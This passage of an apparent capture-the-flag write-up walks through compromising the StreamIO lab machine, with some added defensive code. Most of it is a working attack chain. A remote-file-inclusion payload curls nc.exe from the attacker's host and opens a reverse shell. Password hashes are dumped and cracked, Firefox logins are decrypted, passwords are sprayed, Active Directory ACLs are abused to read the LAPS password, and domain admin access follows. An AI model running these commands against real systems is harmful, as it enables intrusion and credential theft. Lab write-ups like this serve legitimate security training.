echo(" ---- ERROR ---- ");
}
?>base64: invalid input
The last block tells us that the 'include' POST parameter fetches whatever the supplied location returns and passes it to eval(), so we can potentially use it for RFI and execute commands on the system.
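As an added example (not the application's own code), here is how the two inclusion points found so far would be closed: the ?debug= parameter becomes a lookup into a fixed allowlist instead of a path, and the eval() handler in master.php is removed outright. The *_inc.php file names are taken from the admin directory listing later in this writeup; that they are the pages behind the parameter is an assumption.

```php
<?php
// Added example, not the application's code: closing the two inclusion points
// found above. Assumed: the admin pages live next to this file and are the
// *_inc.php files listed in the directory later in the writeup.

// 1. ?debug= : map a short key to a fixed file instead of including user input.
//    The value is only ever used as an array key, never as part of the included
//    path, so there is no directory, scheme or php://filter wrapper to abuse.
const DEBUG_PAGES = array(
    'movie' => 'movie_inc.php',
    'staff' => 'staff_inc.php',
    'user'  => 'user_inc.php',
);

function resolve_debug_page(?string $key): ?string
{
    if ($key === null || !array_key_exists($key, DEBUG_PAGES)) {
        return null;                              // unknown key: include nothing
    }
    $real = realpath(__DIR__ . DIRECTORY_SEPARATOR . DEBUG_PAGES[$key]);
    // Belt and braces: the resolved file must still sit inside this directory.
    if ($real === false || strpos($real, __DIR__ . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

if (isset($_GET['debug'])) {
    $page = resolve_debug_page((string) $_GET['debug']);
    if ($page === null) {
        http_response_code(404);
        exit('unknown page');
    }
    include $page;
}

// 2. The master.php "include" handler ran eval() on whatever the POSTed URL
//    returned. There is no safe variant of that, so the handler is deleted, and
//    the PHP configuration is locked down so a similar bug cannot pull remote
//    code or spawn processes:
//
//    php.ini:
//      allow_url_fopen   = Off   ; file_get_contents() of http:// URLs fails
//      allow_url_include = Off   ; include/require of URLs fails (the default)
//      disable_functions = exec,shell_exec,system,passthru,popen,proc_open
```

The realpath() check is redundant with the allowlist but costs nothing, and it keeps the include safe even if someone later adds a user-controlled suffix to the path.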
The yoshihide user was found in the database, but the same credentials don't give access to the system itself, so we use the RFI to get a reverse shell instead.
shell.php (no opening <?php tag, because master.php passes the fetched content straight to eval()):
$cmd = "curl http://10.10.14.72/nc.exe -o C:\\Windows\\Temp\\nc.exe";
system($cmd);
$cmd = "C:\\Windows\\Temp\\nc.exe 10.10.14.72 1337 -e cmd.exe";
system($cmd);
Execution:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX POST --url 'https://streamio.htb/admin/?debug=master.php' --data 'include=http://10.10.14.72/shell.php' --cookie 'PHPSESSID=qrdq5raiimuql0o5jglipafr20'
Reverse Shell:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ nc -lvp 1337
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.129.204.168.
Ncat: Connection from 10.129.204.168:49213.
Microsoft Windows [Version 10.0.17763.2928]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\streamio.htb\admin>dir
dir
Volume in drive C has no label.
Volume Serial Number is A381-2B63
Directory of C:\inetpub\streamio.htb\admin
02/22/2022 03:49 AM <DIR> .
02/22/2022 03:49 AM <DIR> ..
02/22/2022 03:49 AM <DIR> css
02/22/2022 03:49 AM <DIR> fonts
02/22/2022 03:49 AM <DIR> images
06/03/2022 01:51 AM 2,401 index.php
02/22/2022 04:19 AM <DIR> js
06/03/2022 01:53 AM 3,055 master.php
02/23/2022 03:16 AM 878 movie_inc.php
02/23/2022 03:16 AM 936 staff_inc.php
02/23/2022 03:16 AM 879 user_inc.php
5 File(s) 8,149 bytes
6 Dir(s) 7,064,821,760 bytes free
C:\inetpub\streamio.htb\admin>whoami
whoami
streamio\yoshihide
After upgrading the shell to PowerShell, we try the db_admin credentials found earlier against the local SQL Server:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ nc -lvp 1338
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1338
Ncat: Listening on 0.0.0.0:1338
Ncat: Connection from 10.129.56.7.
Ncat: Connection from 10.129.56.7:62458.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\inetpub\streamio.htb\admin> sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q "SELECT name from streamio_backup..sysobjects WHERE xtype = 'U';"
sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q "SELECT name from streamio_backup..sysobjects WHERE xtype = 'U';"
name
--------------------------------------------------------------------------------------------------------------------------------
movies
users
(2 rows affected)
PS C:\inetpub\streamio.htb\admin> sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q "SELECT username,password FROM streamio_backup..users;"
sqlcmd -S '(local)' -U db_admin -P 'B1@hx31234567890' -Q "SELECT username,password FROM streamio_backup..users;"
username password
-------------------------------------------------- --------------------------------------------------
nikk37 389d14cb8e4e9b94b137deb1caf0612a
yoshihide b779ba15cedfd22a023c4d8bcf5f2332
James c660060492d9edcaa8332d89c99c9239
Theodore 925e5408ecb67aea449373d668b7359e
Samantha 083ffae904143c4796e464dac33c1f7d
Lauren 08344b85b329d7efd611b7a7743e8a09
William d62be0dc82071bccc1322d64ec5b6c51
Sabrina f87d3c0d6c8fd686aacc6627f1f493a5
(8 rows affected)
With CrackStation we get the following (users with no match are left blank):
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ cat db_users-backup_pw
nikk37:get_dem_girls2@yahoo.com
yoshihide:66boysandgirls..
James
Theodore
Samantha
Lauren:##123a8j8w5123##
William
Sabrina:!!sabrina$
Let's continue by gathering user information:
PS C:\inetpub\streamio.htb\admin> whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
================== ==============================================
streamio\yoshihide S-1-5-21-1470860369-1569627196-4264678630-1107
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
ERROR: Unable to get user claims information.
PS C:\inetpub\streamio.htb\admin> net user /domain
net user /domain
User accounts for \\DC
-------------------------------------------------------------------------------
Administrator Guest JDgodd
krbtgt Martin nikk37
yoshihide
The command completed successfully.
PS C:\inetpub\streamio.htb\admin> net user nikk37 /domain
net user nikk37 /domain
User name nikk37
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/22/2022 2:57:16 AM
Password expires Never
Password changeable 2/23/2022 2:57:16 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/22/2022 3:39:51 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
PS C:\inetpub\streamio.htb\admin> net user Martin /domain
net user Martin /domain
User name Martin
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/26/2022 4:16:42 PM
Password expires Never
Password changeable 5/27/2022 4:16:42 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/22/2022 3:57:08 AM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
This means we should go for nikk37 and escalate privileges to Martin.
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ evil-winrm -i dc.streamio.htb -u 'nikk37' -p 'get_dem_girls2@yahoo.com'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nikk37\Documents> whoami
streamio\nikk37
*Evil-WinRM* PS C:\Users\nikk37\Documents> ls
*Evil-WinRM* PS C:\Users\nikk37\Documents> ls ..\Desktop
Directory: C:\Users\nikk37\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/22/2022 3:57 AM 34 user.txt
*Evil-WinRM* PS C:\Users\nikk37\Documents> type ..\Desktop\user.txt
1996f9********************5cf276
And we finally got the user flag!! Let's proceed to escalate privileges.
In our local enumeration, while running winPEAS (not included in the writeup), we found that Firefox is installed and that the profile of nikk37 contains a key4.db file, which holds the key material Firefox uses to protect saved passwords. We download it to our host, together with logins.json from the same profile directory (the file that holds the encrypted credentials themselves), and use firepwd to decrypt them:
C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db (logins.json from the same directory is also needed)
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ mkdir firefox
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ ls firefox
key4.db logins.json
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ python3 /opt/firepwd/firepwd.py -d firefox
globalSalt: b'd215c391179edb56af928a06c627906bcbd4bd47'
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'1baafcd931194d48f8ba5775a41f'
}
}
}
OCTETSTRING b'12e56d1c8458235a4136b280bd7ef9cf'
}
clearText b'70617373776f72642d636865636b0202'
password check? True
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'098560d3a6f59f76cb8aad8b3bc7c43d84799b55297a47c53d58b74f41e5967e'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'e28a1fe8bcea476e94d3a722dd96'
}
}
}
OCTETSTRING b'51ba44cdd139e4d2b25f8d94075ce3aa4a3d516c2e37be634d5e50f6d2f47266'
}
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
With these credentials, we can test every user/password combination against the list of domain users found on the machine:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ cat << EOF >> domain_users
heredoc> yoshihide
heredoc> Martin
heredoc> JDgodd
heredoc> nikk37
heredoc>
heredoc> EOF
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ cat << EOF >> firefox_passwd
heredoc> JDg0dd1s@d0p3cr3@t0r
heredoc> n1kk1sd0p3t00:)
heredoc> paddpadd@12
heredoc> password@12
heredoc>
heredoc> EOF
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ crackmapexec smb dc.streamio.htb -d streamio.htb -u domain_users -p firefox_passwd | grep -v "STATUS_LOGON_FAILURE"
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
if result['type'] is not 'searchResEntry':
SMB streamIO.htb 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamio.htb) (signing:True) (SMBv1:False)
SMB streamIO.htb 445 DC [+] streamio.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r
Found valid user/passwd pair: JDgodd:JDg0dd1s@d0p3cr3@t0r
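The run above is a small password spray: four passwords tried against four accounts from one host, with one success at the end. As an added example (not part of the original writeup), the following detection logic finds that pattern in Security-log events; the event records are constructed samples, and the window and account thresholds are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Security-log sample (not real data) showing what the user list x
# password list run above leaves on the DC: event 4625 (failed logon) per
# guess, then one 4624 (successful logon) once a pair matches. Field names
# follow the TargetUserName / IpAddress fields of those events.
SAMPLE_EVENTS = [
    {"time": "2022-09-22T03:55:01", "id": 4625, "user": "yoshihide", "ip": "10.10.14.5"},
    {"time": "2022-09-22T03:55:01", "id": 4625, "user": "Martin", "ip": "10.10.14.5"},
    {"time": "2022-09-22T03:55:02", "id": 4625, "user": "JDgodd", "ip": "10.10.14.5"},
    {"time": "2022-09-22T03:55:02", "id": 4625, "user": "nikk37", "ip": "10.10.14.5"},
    {"time": "2022-09-22T03:55:03", "id": 4625, "user": "yoshihide", "ip": "10.10.14.5"},
    {"time": "2022-09-22T03:55:03", "id": 4624, "user": "JDgodd", "ip": "10.10.14.5"},
    # One mistyped password from a normal workstation must not trigger.
    {"time": "2022-09-22T03:56:10", "id": 4625, "user": "Martin", "ip": "10.10.20.7"},
    {"time": "2022-09-22T03:56:14", "id": 4624, "user": "Martin", "ip": "10.10.20.7"},
]


def detect_spray(events, window_sec=300, min_accounts=3):
    """Flag every source IP whose failed logons hit at least `min_accounts`
    distinct accounts within any `window_sec`-second window. Unlike a
    per-account lockout counter, this catches one password tried across
    many users. Any 4624 from a flagged source after the spray started is
    reported as the credential the spray found."""
    by_ip = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_ip[ev["ip"]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["id"] == 4625]
        for i, first in enumerate(fails):
            t0 = datetime.fromisoformat(first["time"])
            limit = t0 + timedelta(seconds=window_sec)
            in_win = [f for f in fails[i:] if datetime.fromisoformat(f["time"]) <= limit]
            accounts = {f["user"] for f in in_win}
            if len(accounts) < min_accounts:
                continue
            findings[ip] = {
                "accounts": sorted(accounts),
                "failures": len(in_win),
                "logons_after_spray": [e["user"] for e in evs
                                       if e["id"] == 4624 and e["time"] >= first["time"]],
            }
            break  # one finding per source is enough for an alert
    return findings


if __name__ == "__main__":
    for ip, hit in detect_spray(SAMPLE_EVENTS).items():
        print(f"spray from {ip}: {hit}")
```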
Since we now have access to another user who is not Martin, we should collect data for BloodHound. In this case, we will use bloodhound-python.
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ bloodhound-python -d streamio.htb -u 'JDgodd' -p 'JDg0dd1s@d0p3cr3@t0r' -dc dc.streamio.htb -gc dc.streamio.htb -c all -ns 10.129.56.7
INFO: Found AD domain: streamio.htb
INFO: Connecting to LDAP server: dc.streamio.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.streamio.htb
INFO: Found 8 users
INFO: Connecting to GC LDAP server: dc.streamio.htb
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.streamIO.htb
INFO: Done in 00M 28S
BloodHound found principals with DCSync rights, which makes sense as Martin is a Domain Admin.
More importantly, JDgodd can read the LAPS password through membership of the CORE STAFF group:
But this user is currently not a member of that group:
*Evil-WinRM* PS C:\Users\nikk37> net group
Group Accounts for \\
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*CORE STAFF
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\nikk37> net group 'CORE STAFF'
Group name CORE STAFF
Comment
Members
-------------------------------------------------------------------------------
The command completed successfully.
*Evil-WinRM* PS C:\Users\nikk37> net user JDGodd
User name JDgodd
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/22/2022 2:56:42 AM
Password expires Never
Password changeable 2/23/2022 2:56:42 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/26/2022 11:17:08 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.
We need to add this user to the CORE STAFF group:
*Evil-WinRM* PS C:\Users\nikk37> [string]$userName = 'JDgodd'
*Evil-WinRM* PS C:\Users\nikk37> [string]$userPassword = 'JDg0dd1s@d0p3cr3@t0r'
*Evil-WinRM* PS C:\Users\nikk37> [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
*Evil-WinRM* PS C:\Users\nikk37> [pscredential]$PScred = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)
*Evil-WinRM* PS C:\Users\nikk37> Add-ADGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Credential $PScred
Insufficient access rights to perform the operation
At line:1 char:1
+ Add-ADGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Credentia ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (CORE STAFF:ADGroup) [Add-ADGroupMember], ADException
+ FullyQualifiedErrorId : ActiveDirectoryServer:8344,Microsoft.ActiveDirectory.Management.Commands.AddADGroupMember
The add fails because JDgodd has no rights on the group yet. We first make JDgodd the owner of the group object and then, as owner, grant it full rights on the object through its ACL. For this we use Set-DomainObjectOwner and Add-DomainObjectAcl from PowerView.
*Evil-WinRM* PS C:\Users\nikk37> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\nikk37> [string]$userName = 'streamIO.htb\JDgodd'
*Evil-WinRM* PS C:\Users\nikk37> [string]$userPassword = 'JDg0dd1s@d0p3cr3@t0r'
*Evil-WinRM* PS C:\Users\nikk37> [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force
*Evil-WinRM* PS C:\Users\nikk37> [pscredential]$PScred = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)
*Evil-WinRM* PS C:\Users\nikk37> Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Credential $PScred
*Evil-WinRM* PS C:\Users\nikk37> Add-DomainObjectAcl -TargetIdentity 'CORE STAFF' -PrincipalIdentity 'JDgodd' -Credential $PScred -Rights All
*Evil-WinRM* PS C:\Users\nikk37> Add-ADGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Credential $PScred
*Evil-WinRM* PS C:\Users\nikk37> net group 'CORE STAFF'
Group name CORE STAFF
Comment
Members
-------------------------------------------------------------------------------
JDgodd
The command completed successfully.
Reading the LAPS password of the DC with the JDgodd credentials:
*Evil-WinRM* PS C:\Users\nikk37> Get-DomainObject -Identity $Computers.name -Credential $PScred | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
name dnshostname ms-mcs-admpwd ms-mcs-admpwdexpirationtime
---- ----------- ------------- ---------------------------
DC DC.streamIO.htb %2jiK&+{8q8+%l 133084042097011826
DC
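The chain just walked (WriteOwner over a group, take ownership, rewrite its DACL, add a member, inherit the group's right to read LAPS) is what BloodHound draws as a path. As an added example that is not part of the original writeup, the audit below models that reasoning over a constructed edge list in BloodHound's (source, right, target) shape, modelled on the writeup's findings; the "Help Desk" group and its AddMember edge are assumptions added to show a two-hop path, and "Domain Admins" having GenericAll over the DC is the usual default.

```python
from collections import defaultdict, deque

# Rights that give control of an object. Holding any of them over a group is
# equivalent to membership: an owner can rewrite the DACL, a DACL writer can
# grant itself GenericAll, and GenericAll includes adding members. That is
# the Set-DomainObjectOwner / Add-DomainObjectAcl / Add-ADGroupMember chain.
CONTROL_RIGHTS = {"Owns", "WriteOwner", "WriteDacl", "GenericAll", "GenericWrite", "AddMember"}

# Constructed (source, right, target) edges in the shape BloodHound collects,
# modelled on the writeup's findings. The "Help Desk" group is an assumption
# added to show a two-hop path.
SAMPLE_EDGES = [
    ("JDgodd", "WriteOwner", "CORE STAFF"),
    ("CORE STAFF", "ReadLAPSPassword", "DC"),
    ("Martin", "MemberOf", "Domain Admins"),
    ("Domain Admins", "GenericAll", "DC"),
    ("Help Desk", "AddMember", "Domain Admins"),
    ("nikk37", "MemberOf", "Domain Users"),
]


def _reach(out, start, goal_right, target):
    """Breadth-first search from `start`, following MemberOf and control
    edges. Returns the first path ending in `goal_right` (or GenericAll,
    which implies it) on `target`, or None."""
    queue, seen = deque([(start, [start])]), {start}
    while queue:
        node, path = queue.popleft()
        for right, nxt in out.get(node, []):
            if nxt == target and right in (goal_right, "GenericAll"):
                return path + [right, nxt]
            if (right in CONTROL_RIGHTS or right == "MemberOf") and nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [right, nxt]))
    return None


def control_paths(edges, goal_right, target, privileged=frozenset()):
    """Audit: return {principal: path} for every principal outside the
    `privileged` baseline that can obtain `goal_right` on `target`."""
    out = defaultdict(list)
    for src, right, dst in edges:
        out[src].append((right, dst))
    starts = {src for src, _, _ in edges} - set(privileged)
    found = {s: _reach(out, s, goal_right, target) for s in sorted(starts)}
    return {s: p for s, p in found.items() if p}


if __name__ == "__main__":
    baseline = {"Domain Admins", "Martin"}
    for who, path in control_paths(SAMPLE_EDGES, "ReadLAPSPassword", "DC", baseline).items():
        print(f"{who}: " + " -> ".join(path))
```

Every principal the audit reports, other than the groups meant to hold the right, is an ACL to fix; the fix for the case on this page is removing the WriteOwner ACE rather than watching for membership changes after the fact.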
Accessing the system as Administrator:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ evil-winrm -i dc.streamio.htb -u 'Administrator' -p '%2jiK&+{8q8+%l'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path C:\Users -Recurse -Filter 'root.txt'
Directory: C:\Users\Martin\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/22/2022 3:57 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Martin\Desktop\root.txt
836130********************c97a6c
And we got the root flag!!
Given what we have, we tried to do some injection on . It is a time-based SQLi that takes hours to run. Some data was retrieved, but not all of it. One thing to point out is that, while enumerating for SQLi, we determined this machine is using SQL Server, which is important to know.
Through